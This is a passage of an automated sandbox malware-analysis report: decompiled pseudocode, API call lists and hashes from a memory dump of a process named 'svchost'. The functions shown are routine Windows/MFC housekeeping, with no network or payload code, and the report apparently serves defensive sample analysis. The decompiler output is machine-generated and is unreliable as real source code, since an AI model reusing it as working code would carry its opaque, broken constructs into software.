    0x00414f9a
    0x00414f9f
    0x00414fa5
    0x00414fb0
    0x00414fb5
    0x00414fbb
    0x00414fc6
    0x00414fcb
    0x00414fd1
    0x00414fdc
    0x00414fe1
    0x00414fe7
    0x00414ff2
    0x00414ff7
    0x00414ffd
    0x00415008
    0x0041500d
    0x00415013
    0x0041501e
    0x00415023
    0x00415029
    0x0041502e
    0x00415034
    0x00415038
    0x0041503e
    0x00415045
    0x0041504a
    0x00415050
    0x00415053
    0x0041505a
    0x00415061
    0x00415066
    0x0041506c
    0x00415077
    0x0041507c
    0x00415087
    0x0041508c
    0x00415097
    0x0041509c
    0x004150a7
    0x004150ac
    0x004150b7
    0x004150bc
    0x004150c3
    0x004150cb
    0x004150d6
    0x004150e0

    APIs
      • Part of subcall function 00418600: GetCurrentThreadId.KERNEL32 ref: 00418625
      • Part of subcall function 00418600: IsWindow.USER32(?), ref: 00418641
      • Part of subcall function 00418600: SendMessageA.USER32(?,000083E7,?,00000000), ref: 0041865A
      • Part of subcall function 00418600: ExitProcess.KERNEL32 ref: 0041866F
    • RtlDeleteCriticalSection.NTDLL(004C9E70), ref: 00414DDA
      • Part of subcall function 00485312: __EH_prolog.LIBCMT ref: 00485317
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CriticalCurrentDeleteExitH_prologMessageProcessSectionSendThreadWindow
    • String ID: MA$!$#
    • API String ID: 2888814780-3251899075
    • Opcode ID: 4d2f5031a7e898074db9723be213ce35515f3ba766ccf89a22660fc2200dbec8
    • Instruction ID: f26473f98b07d922f5c367bcb46e04e340de632832149cdc3999efbca82ae59e
    • Opcode Fuzzy Hash: 4d2f5031a7e898074db9723be213ce35515f3ba766ccf89a22660fc2200dbec8
    • Instruction Fuzzy Hash: E49185300087818EDB12EF75C05479ABFE4AFA5348F64085EE4D607392DBB95249C7AB
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0048900A(void** __ecx, char* _a4, short _a8) {
    				signed int _v8;
    				void** _v12;
    				signed int _v16;
    				short* _v20;
    				short _v84;
    				signed int* _t46;
    				signed int _t47;
    				signed int _t48;
    				void* _t61;
    				signed int* _t67;
    				void* _t75;
    				signed int _t81;
    				short* _t84;
    				signed int _t86;
    				signed int _t93;
    				void** _t94;
    				void* _t96;
    
    				_v12 = __ecx;
    				if(__ecx[1] != 0) {
    					GlobalFix( *__ecx);
    					_t67 = _t46;
    					_t47 = _t67[0];
    					_v8 = 0 | _t47 == 0x0000ffff;
    					if(_t47 != 0xffff) {
    						_t48 =  *_t67;
    					} else {
    						_t48 = _t67[3];
    					}
    					asm("sbb esi, esi");
    					_v16 = _t48 & 0x00000040;
    					_t93 = ( ~_v8 & 0x00000002) + 1 << 1;
    					if(_v8 == 0) {
    						 *_t67 =  *_t67 | 0x00000040;
    					} else {
    						_t67[3] = _t67[3] | 0x00000040;
    					}
    					_a4 = _t93 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v84, 0x20) * 2;
    					_t84 = E00488E8D(_t67);
    					_t75 = 0;
    					_v20 = _t84;
    					if(_v16 != 0) {
    						_t75 = _t93 + 2 + E004732E5(_t84 + _t93) * 2;
    					}
    					_t26 = _t84 + 3; // 0x3
    					_t55 = _t75 + _t26 & 0x000000fc;
    					_v16 = _t75 + _t26 & 0x000000fc;
    					_t86 = _t84 +  &(_a4[3]) & 0xfffffffc;
    					if(_v8 == 0) {
    						_t81 = _t67[2];
    					} else {
    						_t81 = _t67[4];
    					}
    					if(_a4 != _t75 && _t81 > 0) {
    						E00470EA0(_t86, _t55, _t67 - _t55 + _v12[1]);
    						_t96 = _t96 + 0xc;
    					}
    					 *_v20 = _a8;
    					E00470EA0(_v20 + _t93,  &_v84, _a4 - _t93);
    					_t94 = _v12;
    					_t94[1] = _t94[1] + _t86 - _v16;
    					GlobalUnWire( *_t94);
    					_t94[2] = _t94[2] & 0x00000000;
    					_t61 = 1;
    					return _t61;
    				}
    				return 0;
    			}
    0x00489016
    0x00489019
    0x00489026
    0x0048902c
    0x00489030
    0x0048903f
    0x00489042
    0x00489049
    0x00489044
    0x00489044
    0x00489044
    0x00489053
    0x00489055
    0x0048905c
    0x00489061
    0x00489069
    0x00489063
    0x00489063
    0x00489063
    0x00489083
    0x0048908c
    0x0048908e
    0x00489090
    0x00489096
    0x004890a2
    0x004890a2
    0x004890a9
    0x004890ad
    0x004890b3
    0x004890b6
    0x004890bd
    0x004890c5
    0x004890bf
    0x004890bf
    0x004890bf
    0x004890cc
    0x004890de
    0x004890e3
    0x004890e3
    0x004890f3
    0x004890fd
    0x00489102
    0x0048910d
    0x00489110
    0x00489116
    0x0048911c
    0x00000000
    0x0048911e
    0x00000000

    APIs
    • GlobalFix.KERNEL32 ref: 00489026
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00489079
    • GlobalUnWire.KERNEL32(?), ref: 00489110
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Global$ByteCharMultiWideWire
    • String ID: @
    • API String ID: 599868136-2766056989
    • Opcode ID: 85ba9ff0d2175e7d85d03607dea1a5789379dcea550fdc3ac0afa182c157cecd
    • Instruction ID: e829a2aba545ff3a89ceca93313109af3b6be272ed64f8f1fbffcc2eb5991ca8
    • Opcode Fuzzy Hash: 85ba9ff0d2175e7d85d03607dea1a5789379dcea550fdc3ac0afa182c157cecd
    • Instruction Fuzzy Hash: BB410672800606EBCB14DFA4C8819BEBBB8FF41314F14C56AE815AB244D3399E46CB88
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E0048CF0C(intOrPtr __ecx, void* __edi) {
    				int _t35;
    				int _t36;
    				void* _t37;
    				void* _t43;
    				intOrPtr* _t62;
    				intOrPtr* _t63;
    				intOrPtr* _t64;
    				intOrPtr* _t68;
    				intOrPtr* _t69;
    				void* _t70;
    				intOrPtr _t74;
    				void* _t76;
    
    				_t70 = __edi;
    				E00473304(E00490ED8, _t76);
    				_push(__ecx);
    				_t74 = __ecx;
    				 *((intOrPtr*)(_t76 - 0x10)) = __ecx;
    				 *((intOrPtr*)(__ecx)) = 0x49cd78;
    				_t62 =  *((intOrPtr*)(__ecx + 0x80));
    				 *(_t76 - 4) = 0;
    				if(_t62 != 0) {
    					 *((intOrPtr*)( *_t62 + 4))(1);
    				}
    				_t63 =  *((intOrPtr*)(_t74 + 0xa8));
    				if(_t63 != 0) {
    					 *((intOrPtr*)( *_t63 + 0x14))(1);
    				}
    				if( *((intOrPtr*)(E0048C6BF() + 0x14)) == 0) {
    					_t68 =  *0x4e1458; // 0x0
    					if(_t68 != 0) {
    						 *((intOrPtr*)( *_t68 + 4))(1);
    						 *0x4e1458 = 0;
    					}
    					_t69 =  *0x4e1454; // 0x0
    					if(_t69 != 0) {
    						 *((intOrPtr*)( *_t69 + 4))(1);
    						 *0x4e1454 = 0;
    					}
    				}
    				_t33 =  *((intOrPtr*)(_t74 + 0x94));
    				if( *((intOrPtr*)(_t74 + 0x94)) != 0) {
    					E0048A8DD(_t33);
    				}
    				_t34 =  *((intOrPtr*)(_t74 + 0x98));
    				if( *((intOrPtr*)(_t74 + 0x98)) != 0) {
    					E0048A8DD(_t34);
    				}
    				_t35 =  *((intOrPtr*)(_t74 + 0xb0));
    				_push(_t70);
    				if(_t35 != 0) {
    					GlobalDeleteAtom(_t35);
    				}
    				_t36 =  *((intOrPtr*)(_t74 + 0xb2));
    				if(_t36 != 0) {
    					GlobalDeleteAtom(_t36);
    				}
    				_t64 =  *((intOrPtr*)(_t74 + 0xac));
    				if(_t64 != 0) {
    					 *((intOrPtr*)( *_t64 + 4))(1);
    				}
    				_t37 = E0048C6BF();
    				if( *((intOrPtr*)(_t37 + 0x10)) ==  *((intOrPtr*)(_t74 + 0x78))) {
    					 *((intOrPtr*)(_t37 + 0x10)) = 0;
    				}
    				if( *((intOrPtr*)(_t37 + 4)) == _t74) {
    					 *((intOrPtr*)(_t37 + 4)) = 0;
    				}
    				E004715AE( *((intOrPtr*)(_t74 + 0x78)));
    				E004715AE( *((intOrPtr*)(_t74 + 0x7c)));
    				E004715AE( *((intOrPtr*)(_t74 + 0x88)));
    				E004715AE( *((intOrPtr*)(_t74 + 0x8c)));
    				E004715AE( *((intOrPtr*)(_t74 + 0x90)));
    				 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
    				 *((intOrPtr*)(_t74 + 0x28)) = 0;
    				_t43 = E0048DAE0(_t74);
    				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
    				return _t43;
    			}
    0x0048cf0c
    0x0048cf11
    0x0048cf16
    0x0048cf19
    0x0048cf1b
    0x0048cf1e
    0x0048cf24
    0x0048cf2e
    0x0048cf31
    0x0048cf37
    0x0048cf37
    0x0048cf3a
    0x0048cf42
    0x0048cf48
    0x0048cf48
    0x0048cf53
    0x0048cf55
    0x0048cf5d
    0x0048cf63
    0x0048cf66
    0x0048cf66
    0x0048cf6c
    0x0048cf74
    0x0048cf7a
    0x0048cf7d
    0x0048cf7d
    0x0048cf74
    0x0048cf83
    0x0048cf8b
    0x0048cf8e
    0x0048cf8e
    0x0048cf93
    0x0048cf9b
    0x0048cf9e
    0x0048cf9e
    0x0048cfa3
    0x0048cfaa
    0x0048cfb4
    0x0048cfb7
    0x0048cfb7
    0x0048cfb9
    0x0048cfc3
    0x0048cfc6
    0x0048cfc6
    0x0048cfc8
    0x0048cfd1
    0x0048cfd7
    0x0048cfd7
    0x0048cfda
    0x0048cfe5
    0x0048cfe7
    0x0048cfe7
    0x0048cfed
    0x0048cfef
    0x0048cfef
    0x0048cff5
    0x0048cffd
    0x0048d008
    0x0048d013
    0x0048d01e
    0x0048d023
    0x0048d02c
    0x0048d02f
    0x0048d039
    0x0048d041

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AtomDeleteGlobal$H_prolog
    • String ID: ^I
    • API String ID: 3979803748-3473481074
    • Opcode ID: bf1ba5fd5e8b8e886067ee91b25e1ec73ec849dbe9bb0fd3ba3faa8b7c24b773
    • Instruction ID: 74373865aa010b08e89b9b97141fa36ac7995f425c86afa39fd6c842b2dd3b3f
    • Opcode Fuzzy Hash: bf1ba5fd5e8b8e886067ee91b25e1ec73ec849dbe9bb0fd3ba3faa8b7c24b773
    • Instruction Fuzzy Hash: F53142306006409FDB24BF65C9D5A5EBBA2FF04304F15886FE25B9B6B2C7749D44CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0041C270(void* __esi, void* __ebp) {
    				intOrPtr _v4;
    				char _v16;
    				void* __ecx;
    				struct HACCEL__* _t14;
    				intOrPtr* _t19;
    				void* _t20;
    				void* _t27;
    				struct HICON__* _t28;
    				intOrPtr* _t31;
    				intOrPtr* _t32;
    				struct HACCEL__* _t44;
    				void* _t45;
    				void* _t46;
    				void* _t48;
    				void* _t49;
    				int* _t50;
    				void* _t51;
    				void* _t54;
    
    				_t51 = __ebp;
    				_t45 = __esi;
    				_t31 = _t32;
    				_t44 = 0;
    				_t14 =  *(_t31 + 0x1dc);
    				_t55 = _t14;
    				if(_t14 != 0) {
    					DestroyAcceleratorTable(_t14);
    					 *(_t31 + 0x1dc) = 0;
    				}
    				if(E00413AB0(E00418A40(0x3e9, _t44, _t44), _t55,  *((intOrPtr*)(_t31 + 0xdc)),  &_v16, _t44) != 1) {
    					L9:
    					E00418A40(0x7d0,  *((intOrPtr*)(_t31 + 0xdc)), 0);
    					_t19 = E004171E0();
    					__eflags = _t19;
    					if(_t19 == 0) {
    						__eflags =  *0x4c958c - 1;
    						if( *0x4c958c == 1) {
    							PostQuitMessage(0);
    						}
    					}
    					_t20 = E004854BE(_t19);
    					__eflags = _t31;
    					if(_t31 == 0) {
    						return _t20;
    					} else {
    						return  *((intOrPtr*)( *_t31 + 4))(1);
    					}
    				} else {
    					_push(_t51);
    					_push(_t45);
    					while(1) {
    						_t44 =  &(_t44->i);
    						_t46 = E004135B0(_v4 + 0x14, _t44, 0);
    						if(_t46 == 0) {
    							break;
    						}
    						_t8 = _t44 - 1; // 0x1
    						_t40 = _v4 + 0x14;
    						if(E00413C90(_v4 + 0x14, _t8) == 0) {
    							_t48 = _t46 + 0x18;
    							_t49 = _t48 + E0040C020(_t40, _t48);
    							_t27 = E0040C020(_t40, _t49);
    							_t11 = _t49 + 0x14; // 0x14
    							_t50 = _t27 + _t11;
    							_t54 = _t54 + 8;
    							_t28 =  *_t50;
    							if(_t28 != 0) {
    								DestroyCursor(_t28);
    								 *_t50 = 0;
    							}
    						}
    					}
    					goto L9;
    				}
    			}
    0x0041c270
    0x0041c270
    0x0041c272
    0x0041c275
    0x0041c277
    0x0041c27d
    0x0041c27f
    0x0041c282
    0x0041c288
    0x0041c288
    0x0041c2b1
    0x0041c312
    0x0041c320
    0x0041c32a
    0x0041c32f
    0x0041c331
    0x0041c333
    0x0041c33a
    0x0041c33e
    0x0041c33e
    0x0041c33a
    0x0041c346
    0x0041c34b
    0x0041c34d
    0x0041c35b
    0x0041c34f
    0x00000000
    0x0041c355
    0x0041c2b3
    0x0041c2b3
    0x0041c2ba
    0x0041c2bb
    0x0041c2c4
    0x0041c2cd
    0x0041c2d1
    0x00000000
    0x00000000
    0x0041c2d7
    0x0041c2db
    0x0041c2e5
    0x0041c2e7
    0x0041c2f0
    0x0041c2f3
    0x0041c2f8
    0x0041c2f8
    0x0041c2fc
    0x0041c2ff
    0x0041c303
    0x0041c306
    0x0041c308
    0x0041c308
    0x0041c303
    0x0041c2e5
    0x00000000
    0x0041c311

    APIs
    • DestroyAcceleratorTable.USER32(?), ref: 0041C282
    • DestroyCursor.USER32(00000000), ref: 0041C306
    • PostQuitMessage.USER32(00000000), ref: 0041C33E
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Destroy$AcceleratorCursorMessagePostQuitTable
    • String ID: ^I
    • API String ID: 40448814-3473481074
    • Opcode ID: d312750a9a1ed2b6a32b767875e598d58ee2d6d671133c062bafe09f893f6704
    • Instruction ID: f665e91321884240b908e254e3bbee1e076b294f88ecf1481de6675e129dbe22
    • Opcode Fuzzy Hash: d312750a9a1ed2b6a32b767875e598d58ee2d6d671133c062bafe09f893f6704
    • Instruction Fuzzy Hash: A2218371640201ABD7249FA6CC85F9B77A8AF90705F04457FFD059B282EA78DC84C7A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 45%
    			E0043CBB0(char _a4) {
    				signed int _v4;
    				intOrPtr _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				char _v28;
    				char _v32;
    				intOrPtr _t22;
    				intOrPtr _t25;
    				void* _t26;
    				void* _t30;
    				intOrPtr _t39;
    				void* _t47;
    				void* _t50;
    				signed int _t51;
    				signed int _t52;
    				intOrPtr _t54;
    
    				_push(0xffffffff);
    				_push(E00490288);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t54;
    				if(_a4 != 0) {
    					_v28 = _a4;
    					_v24 = 0;
    					_v20 = 0;
    					_v16 = 0;
    					_v4 = 0;
    					 *0x49224c(0x4c9e70, _t47, _t50);
    					_t51 = 0;
    					while(1) {
    						_t22 =  *0x4c9e8c; // 0x0
    						if(_t22 == 0) {
    							break;
    						}
    						_t39 =  *0x4c9e90; // 0x0
    						if(_t51 < _t39 - _t22 >> 2) {
    							_push( *((intOrPtr*)(_t22 + _t51 * 4)) + 0x20);
    							_push(1);
    							_push(_v24);
    							E004298E0( &_v32);
    							_t51 = _t51 + 1;
    							continue;
    						}
    						break;
    					}
    					 *0x492250(0x4c9e70);
    					E0043CCA0();
    					_t52 = 0;
    					while(1) {
    						_t25 = _v32;
    						if(_t25 == 0 || _t52 >= _v28 - _t25 >> 2) {
    							break;
    						}
    						WaitForSingleObject( *(_t25 + _t52 * 4), 0xffffffff);
    						_t52 = _t52 + 1;
    					}
    					_t26 = E0048302C(_t25);
    					 *[fs:0x0] = _v20;
    					return _t26;
    				} else {
    					_t30 = E0043CCA0();
    					 *[fs:0x0] = _v12;
    					return _t30;
    				}
    			}
    0x0043cbb6
    0x0043cbb8
    0x0043cbbd
    0x0043cbc2
    0x0043cbd1
    0x0043cbee
    0x0043cbf2
    0x0043cbf6
    0x0043cbfa
    0x0043cc03
    0x0043cc07
    0x0043cc0d
    0x0043cc0f
    0x0043cc0f
    0x0043cc16
    0x00000000
    0x00000000
    0x0043cc18
    0x0043cc25
    0x0043cc35
    0x0043cc36
    0x0043cc38
    0x0043cc39
    0x0043cc3e
    0x00000000
    0x0043cc3e
    0x00000000
    0x0043cc25
    0x0043cc46
    0x0043cc4c
    0x0043cc57
    0x0043cc59
    0x0043cc59
    0x0043cc5f
    0x00000000
    0x00000000
    0x0043cc74
    0x0043cc76
    0x0043cc76
    0x0043cc7a
    0x0043cc86
    0x0043cc93
    0x0043cbd3
    0x0043cbd3
    0x0043cbdd
    0x0043cbe7
    0x0043cbe7

    APIs
    • RtlEnterCriticalSection.NTDLL(004C9E70), ref: 0043CC07
    • RtlLeaveCriticalSection.NTDLL(004C9E70), ref: 0043CC46
    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?), ref: 0043CC74
      • Part of subcall function 0043CCA0: RtlEnterCriticalSection.NTDLL(004C9E70), ref: 0043CCA7
      • Part of subcall function 0043CCA0: SetEvent.KERNEL32(?,?,?,?,?), ref: 0043CCD4
      • Part of subcall function 0043CCA0: RtlLeaveCriticalSection.NTDLL(004C9E70), ref: 0043CCDE
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CriticalSection$EnterLeave$EventObjectSingleWait
    • String ID: ^I
    • API String ID: 497781136-3473481074
    • Opcode ID: a3bc7313fbcfae264f8b6553b694d66f29f491bd3d1f4ff8d42be61b29ec54f1
    • Instruction ID: 39edfa5902c793a6b17f5c109151ac1ab53aa7a6a4aa854a337ba7f5bec2b722
    • Opcode Fuzzy Hash: a3bc7313fbcfae264f8b6553b694d66f29f491bd3d1f4ff8d42be61b29ec54f1
    • Instruction Fuzzy Hash: B821F1751082419FC710DFA9D9C5A2AF7A0FB98710F506A3EF486A3290C7789804CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E00438EF0(void* __ebx, void* __ecx, void* __edi, void* __ebp) {
    				long _v28;
    				char _v32;
    				char _v36;
    				char _v368;
    				intOrPtr _v400;
    				char _v516;
    				char _v540;
    				char _v544;
    				char _v552;
    				void* _t21;
    				intOrPtr* _t23;
    				void* _t49;
    				intOrPtr _t51;
    
    				_push(0xffffffff);
    				_push(E004900F1);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t51;
    				_push(__ecx);
    				_push(0x4b2f44);
    				_push(0x806);
    				_push("out.prn");
    				_push("prn");
    				_push(0);
    				E00481475( &_v516);
    				_v28 = 0;
    				_v400 = 0x4b2f20;
    				if(E0048160F(__ebx) == 1) {
    					_t23 = E004816EA( &_v540,  &_v544);
    					_t49 = __ecx + 0x3e0;
    					_v32 = 1;
    					E0048754F(_t49,  *_t23);
    					_v36 = 0;
    					E004832C2( &_v552);
    					SendMessageA( *(_t49 + 0x1c), 0xb1, 0, 0xffffffff);
    					SendMessageA( *(_t49 + 0x1c), 0xb7, 0, 0);
    					E0048768A(_t49);
    				}
    				_v28 = 2;
    				E004832C2( &_v368);
    				_v28 = 0xffffffff;
    				_t21 = E00484054( &_v540);
    				 *[fs:0x0] = _v36;
    				return _t21;
    			}
    0x00438ef0
    0x00438ef2
    0x00438efd
    0x00438efe
    0x00438f0e
    0x00438f0f
    0x00438f14
    0x00438f19
    0x00438f1e
    0x00438f23
    0x00438f29
    0x00438f32
    0x00438f3d
    0x00438f50
    0x00438f5c
    0x00438f63
    0x00438f6c
    0x00438f74
    0x00438f7d
    0x00438f85
    0x00438f9d
    0x00438fac
    0x00438fb0
    0x00438fb5
    0x00438fbd
    0x00438fc8
    0x00438fd1
    0x00438fdc
    0x00438fe9
    0x00438ff6

    APIs
      • Part of subcall function 00481475: __EH_prolog.LIBCMT ref: 0048147A
      • Part of subcall function 00481475: lstrcpyn.KERNEL32(?,?,00000104), ref: 00481567
      • Part of subcall function 0048160F: lstrlen.KERNEL32(?,?,?,0000000C,?,?,00422B89,?,-00000001,00000000,?,?,?,004B1B90), ref: 00481619
      • Part of subcall function 0048160F: GetFocus.USER32 ref: 00481634
      • Part of subcall function 0048160F: IsWindowEnabled.USER32(?), ref: 0048165D
      • Part of subcall function 0048160F: EnableWindow.USER32(?,00000000), ref: 0048166F
      • Part of subcall function 0048160F: EnableWindow.USER32(?,00000001), ref: 004816B8
      • Part of subcall function 0048160F: IsWindow.USER32(?), ref: 004816BE
      • Part of subcall function 0048160F: SetFocus.USER32(?), ref: 004816CC
      • Part of subcall function 004816EA: __EH_prolog.LIBCMT ref: 004816EF
      • Part of subcall function 004816EA: GetParent.USER32(?), ref: 0048172C
      • Part of subcall function 004816EA: SendMessageA.USER32(?,00000464,00000104,00000000), ref: 00481754
      • Part of subcall function 004816EA: GetParent.USER32(?), ref: 0048177D
      • Part of subcall function 004816EA: SendMessageA.USER32(?,00000465,00000104,00000000), ref: 0048179A
      • Part of subcall function 0048754F: SetWindowTextA.USER32(?,004212EA), ref: 0048755D
      • Part of subcall function 004832C2: InterlockedDecrement.KERNEL32(-000000F4), ref: 004832D6
    • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00438F9D
    • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00438FAC
      • Part of subcall function 0048768A: SetFocus.USER32(?,00417893), ref: 00487694
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$MessageSend$Focus$EnableH_prologParent$DecrementEnabledInterlockedTextlstrcpynlstrlen
    • String ID: out.prn$prn
    • API String ID: 3571112515-3109735852
    • Opcode ID: e16afb9db057877d34d722ba35aac73bbdf6ab15b86ce365e3c3b301b31d78da
    • Instruction ID: e3f9c3cef216e92be05f8f836772eaf366b8aa9b54b0ba7f89b762ba95618730
    • Opcode Fuzzy Hash: e16afb9db057877d34d722ba35aac73bbdf6ab15b86ce365e3c3b301b31d78da
